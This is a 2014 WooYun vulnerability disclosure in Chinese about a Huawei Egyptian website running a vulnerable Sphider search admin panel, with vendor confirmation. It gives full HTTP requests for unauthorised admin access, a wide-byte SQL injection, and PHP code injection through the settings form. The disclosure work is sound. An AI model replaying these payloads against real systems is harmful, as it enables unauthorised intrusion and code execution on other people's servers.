当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-071590

漏洞标题:华为某站点多处漏洞(命令执行等)

相关厂商:华为技术有限公司

漏洞作者: 白非白

提交时间:2014-08-08 18:44

修复时间:2014-09-22 18:46

公开时间:2014-09-22 18:46

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-08: 细节已通知厂商并且等待厂商处理中
2014-08-12: 厂商已经确认,细节仅向厂商公开
2014-08-22: 细节向核心白帽子及相关领域专家公开
2014-09-01: 细节向普通白帽子公开
2014-09-11: 细节向实习白帽子公开
2014-09-22: 细节向公众公开

简要描述:

1.后台未授权访问
2.sql注入
3.命令执行

详细说明:

问题点:http://www.huaweidevice.com.eg/huawei_ar/sphider/admin/admin.php
使用了有漏洞的sphider版本。
1.后台未授权访问
request:

POST /huawei_ar/sphider/admin/admin.php HTTP/1.1
Host: www.huaweidevice.com.eg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 19
user=admin&pass=bar


屏幕快照 2014-08-08 下午6.40.54.png


2.sql注入
request:

POST /huawei_ar/sphider/admin/admin.php HTTP/1.1
Host: www.huaweidevice.com.eg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
user=foo&pass=bar&f=20&site_id=1%df'


屏幕快照 2014-08-08 下午6.41.38.png


3.命令执行
request;(获取 phpversion())

POST /huawei_ar/sphider/admin/admin.php HTTP/1.1
Host: www.huaweidevice.com.eg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=7fabfda77b710466db1a18d65031fa66
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 523
user=foo&pass=bar&f=settings&Submit=ion_nr=1.3.5&_language=en&_template=standard&_admin_email=admin%40localhost&_tmp_dir=tmp&_log_dir=log&_log_format=html&_min_words_per_page=10&_min_word_length=3&_word_upper_bound=100&_pdftotext_path=&_catdoc_path=&_xls2csv_path=&_catppt_path=&_user_agent=&_min_delay=0&_results_per_page=10&_cat_columns=2&_bound_search_result=0&_length_of_link_desc=0&_links_to_next=9&_desc_length=250&_suggest_rows=0&_title_weight=20&_domain_weight=60&_path_weight=10&_meta_weight=5;echo%20phpversion();


屏幕快照 2014-08-08 下午6.30.32.png

漏洞证明:

修复方案:

shell什么的就不用了吧?

版权声明:转载请注明来源 白非白@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-08-12 11:19

厂商回复:

感谢白帽子对华为公司的关注,相关的业务部门正在修补该漏洞信息。

最新状态:

暂无